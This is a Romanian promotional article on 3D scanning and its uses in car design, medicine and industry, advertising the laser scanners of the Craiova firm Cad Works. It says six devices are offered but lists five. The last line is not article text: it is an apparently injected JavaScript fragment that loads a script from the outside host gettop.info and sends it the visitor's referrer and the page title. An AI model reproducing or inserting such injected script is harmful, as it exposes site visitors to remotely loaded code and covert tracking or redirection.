Tehnologia a luat proportii uriase in ultimii zeci de ani. Domenii precum industria constructoare de masini, medicina, constructiile, industria alimentara depasesc noi frontiere datorita utilizarii unor mijloace tehnologice foarte importante cu o larga posibilitate de aplicare.

O astfel derevscan tehnologie ce a dus la revolutionarea diferitelor domenii este scanarea 3D. Aceasta scanare se realizeaza cu ajutorul unor dispozitive speciale ce utilizeaza tehnologia infrarosu si poate reda orice obiect din realitate intr-un mediu virtual. Imaginati-va gama foarte variata de aplicatii ale acestei tehnologii.

Spre exemplu, in industria constructoare de masini, cu un astfel de aparat de scanare 3d se poate transpune pe un computer varianta la scara mai mica a unui automobil pentru a ii face diferite modificari. Se poate retusa aerodinamica automobilului, partile caroseriei, iar daca doresc, inginerii pot scana motorul automobilului pentru a-i aduce schimbari de imbunatatire a performantelor.

Un astfel de scanner 3D se poate folosi si in medicina plastica si estetica. Inaintea interventiei chirurgicale, pacientului i se poate prezenta exact imagini “before and after” cu zona in care se va interveni, modelul scanat putand fi remodelat dupa bunul plac al utilizatorului. In domeniul medicinei ortopedice, scanarea 3D ajuta foarte mult la depistarea afectiunilor coloanei vertebrale (scolioza, spondiloza, cifoscolioza si altele). Cu ajutorul acestui scanner 3D se poate calcula cu precizie foarte mare curbura coloanei vertebrale si astfel sa se determine inca din faza incipienta diferite afectiuni.

In industrii, scanner-ele 3D sunt folosite pentru scanarea diferitelor piese si pentru a transpune datele de constructie ale acestora in mediul virtual. Avand acces la modelul grafic tridimensional al piesei si la datele de constructie ale acesteia se pot realiza numeroase operatiuni de modelare, redimensionare, verificare etc.

Firma Cad Works, infiintata in anul 1996, ofera clientilor interesati scannere 3D ce functioneaza pe baza tehnologiei cu laser.

Firma craioveana realizeaza si proiecteaza aceste scannere in functiile de nevoile si cerintele clientilor.

Firma craioveana distribuie in Romania aceste scannere si poate realiza si servicii in functie de nevoile si cerintele clientilor. Avantajele acestor dispozitive de scanare constau in faptul ca datorita manipularii manuale, pozitionarea poate fi foarte precisa datorita tehnologiei laser. Aceste dispozitive fiind foarte usor de manevrat si conferind un grad ridicat de portabilitate, au revolutionat in adevaratul sens al cuvantului  ingineria inversa si inspectia.

Ingineria inversa se ocupa cu produsele finite. Datorita dispozitivelor de scanare, aceste produse finite pot fi supuse unor game complete de procedee tehnice virtuale precise. Vorbim despre verificare, remodelare, imbunatatirea performantelor si multe altele.

Firma craioveana ofera 6 dispozitive de scanare tridimensionala:

  • ERGOScan. Un dispozitiv ce ofera un plus de confort la utilizare si se poate folosi in domeniul medical, aeronautic, auto, industrial etc.
  • EXAScan. Acest scanner 3d este folosit pentru inspectia dimensiunilor geometrice posedand o precizie foarte inalta.
  • MAXScan este un dispozitiv de scanare tridimensionala ce poate fi folosit in cadrul ingineriei inverse. Scanurile 3d pot fi introduse in CAD si apoi modificate sau testate dupa bunul plac al utilizatorului.
  • REVScan este un scanner 3d ce poate fi folosit in diverse aplicatii precum: reconstructia suprafetelor, modelarea 3d, proiectarea mecanica si altele.
  • ViuScan poate fi folosit in industrii de divertisment si multimedia, dar si pentru design industrial.

Avand o gama foarte larga de aplicatii, scanarea 3D este o tehnologie ce revolutioneaza foarte multe domenii. Profesionistii firmei Cad Works va pun la dispozitie astfel de dispozitive la preturi foarte avantajoase, oferindu-se un raport calitate-pret optim.

Puteti citi si alte articole interesante accesand link-ul urmator www.articolebiz.ro .

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;